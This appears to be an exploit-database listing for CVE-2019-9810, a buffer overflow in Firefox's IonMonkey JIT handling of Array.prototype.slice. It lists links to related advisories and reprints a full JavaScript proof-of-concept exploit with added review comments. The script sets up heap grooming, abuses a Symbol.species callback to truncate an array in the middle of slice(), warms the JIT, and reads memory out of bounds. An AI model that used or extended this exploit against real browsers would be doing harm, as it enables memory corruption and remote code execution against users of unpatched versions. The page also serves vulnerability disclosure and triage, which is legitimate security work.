Firefox 66.0.1 - Array.prototype.slice Buffer Overflow Exploit

🗓️ 27 Mar 2019 00:00:00 | Reported by xuechiyaobai | Type: zdt | 🔗 0day.today | 👁 46 Views

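Exploit for the Array.prototype.slice buffer overflow in Firefox, version 66.0. The related entries on this page track the flaw as CVE-2019-9810, and the Exploit DB entry lists the affected range as Firefox < 66.0.1, so upgrading to 66.0.1 or later is the remedy that range implies.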

Related
Code
ReporterTitlePublishedViews
Family
Check Point Advisories
Mozilla Firefox IonMonkey JIT Compiler Buffer Overflow (CVE-2019-9810)
3 Apr 201900:00
checkpoint_advisories
Prion
Buffer overflow
26 Apr 201917:29
prion
Packet Storm
Firefox Array.prototype.slice Buffer Overflow
27 Mar 201900:00
packetstorm
UbuntuCve
CVE-2019-9810
25 Mar 201900:00
ubuntucve
NVD
CVE-2019-9810
26 Apr 201917:29
nvd
Veracode
Buffer Overflow
16 May 201903:58
veracode
Exploit DB
Firefox < 66.0.1 - 'Array.prototype.slice' Buffer Overflow
26 Mar 201900:00
exploitdb
Exploit DB
Mozilla FireFox (Windows 10 x64) - Full Chain Client Side Attack
7 Dec 201900:00
exploitdb
Zero Day Initiative
(Pwn2Own) Mozilla Firefox Array.slice Out-Of-Bounds Write Remote Code Execution Vulnerability
15 Apr 201900:00
zdi
Debian CVE
CVE-2019-9810
26 Apr 201917:29
debiancve
Firefox < 66.0.1 - 'Array.prototype.slice' Buffer Overflow 

<script>

// Element count used for every array this script builds; gc() doubles it for the
// length of each Uint32Array it allocates.
let size = 64;

// NOTE(review): garr and j are assigned without let/const/var, so they are implicit
// globals. garr holds each batch allocated by gc(); j is the next free index in garr.
garr = [];
j = 0;
/**
 * Allocation helper. Despite the name, it does not request a garbage collection:
 * it creates 0x20000 Uint32Array objects of size*2 elements each, fills every one
 * with an alternating pair of fixed 32-bit constants, and stores the batch in the
 * global garr so it stays reachable.
 *
 * NOTE(review): presumably the recognisable constants are there so that memory
 * reused after the arrays are truncated is easy to identify in the value the
 * script finally displays. That intent is inferred, not stated on the page.
 */
function gc(){
	var tmp = [];
	for(let i = 0;i < 0x20000;i++){
		tmp[i] = new Uint32Array(size * 2);
		// This `let j` shadows the global j for the duration of the inner loop only.
		for(let j = 0;j < (size*2);j+=2){
			tmp[i][j] = 0x12345678;
			tmp[i][j+1] = 0xfffe0123;
		}
	}
	// Outside the inner loop j is the global counter again.
	garr[j++] = tmp;
}

// The array that jit() calls slice() on. Its `constructor` property is replaced
// with obj near the end of the script.
let arr = [{},2.2];

// Plain object that receives a Symbol.species function and later stands in as
// arr.constructor.
let obj = {};

// Species constructor for obj. Once arr.constructor is obj, Array.prototype.slice
// looks up constructor[Symbol.species] to build its result array, so this function
// runs as script code in the middle of arr.slice().
//
// Visible side effects: it sets victim.length and every gvictim[i].length to 0,
// drops the gvictim references, then calls gc() to allocate typed arrays. Because
// it is invoked as a constructor and returns an object, [1.1] becomes slice()'s
// result array.
//
// NOTE(review): this is the re-entrancy a JIT has to account for. The advisories
// listed on this page (CVE-2019-9810) describe an IonMonkey JIT buffer overflow in
// Array.prototype.slice, which is consistent with compiled code not expecting
// slice() to change another array's length. Confirm against the vendor advisory.
obj[Symbol.species] = function(){
	victim.length = 0x0;
	for(let i = 0;i < 0x2000;i++){
		gvictim[i].length = 0x0;
		gvictim[i] = null;
	}
	gc();
	//Array.isArray(garr[0][0x10000]);
	return [1.1];
}

// Builds 0x2000 arrays of doubles plus one `victim` array, all with length `size`
// and every element set to 3.3. victim is created between the first 0x1000 and
// the second 0x1000 gvictim entries.
// NOTE(review): presumably this ordering is meant to surround victim's storage
// with identically sized allocations. The allocator layout is not visible here.
let gvictim = [];

for(let i = 0;i < 0x1000;i++){
	gvictim[i] = [1.1,2.2];
	gvictim[i].length = size;
	gvictim[i].fill(3.3);
}

// The array that jit() writes to and reads from around the slice() call.
let victim = [1.1,2.2];
victim.length = size;
victim.fill(3.3);

for(let i = 0x1000;i < 0x2000;i++){
	gvictim[i] = [1.1,2.2];
	gvictim[i].length = size;
	gvictim[i].fill(3.3);
}

// Empty function used only as a property bag: the loop below adds `size`
// properties named x0 .. x63, each set to 2.2. In the visible code `fake` is
// referenced only by a commented-out line in jit(), so it has no effect on the
// script as published.
function fake(arg){
}
for(let i = 0;i < size;i++){
	fake["x"+i.toString()] = 2.2;
}

/**
 * Hot function that the warm-up loop calls 0x10000 times: writes victim[1],
 * calls arr.slice() and returns victim[2].
 *
 * While arr.constructor is still the default, slice() has no effect on victim.
 * After arr.constructor is set to obj, slice() runs the species function, which
 * sets victim.length to 0. An engine that re-checks bounds after the call then
 * returns undefined for victim[2]; any other value means the read used stale
 * length information.
 *
 * @returns {*} The value read from victim[2] after the slice() call.
 */
function jit(){
	victim[1] = 1.1;
	arr.slice();
	//fake.x2 = 6.17651672645e-312;
	return victim[2];
}

// NOTE(review): flag is an implicit global and is never read in the visible code.
flag = 0;


// Warm-up: 0x10000 calls with the default Array constructor, so the engine sees
// jit() as hot before slice() gains any side effect. xx is an implicit global and
// its value is not used.
for(let i = 0;i < 0x10000;i++){
	xx = jit();
}

// Only now is the species-carrying object installed, so the next arr.slice()
// inside jit() runs obj[Symbol.species].
arr.constructor = obj;

// The result is discarded, so this call has no effect visible in the script.
Array.isArray(victim);
alert(333);
// Shows what jit() read from victim[2] after the species function truncated
// victim. For triage: a build that is not affected (the page lists the affected
// range as Firefox < 66.0.1) is expected to show undefined here.
alert(jit());
</script>

27 Mar 2019 00:00 (Current)
0.9 (Low risk)
Vulners AI Score: 0.9
CVSS2: 6.8
CVSS3: 8.8
EPSS: 0.936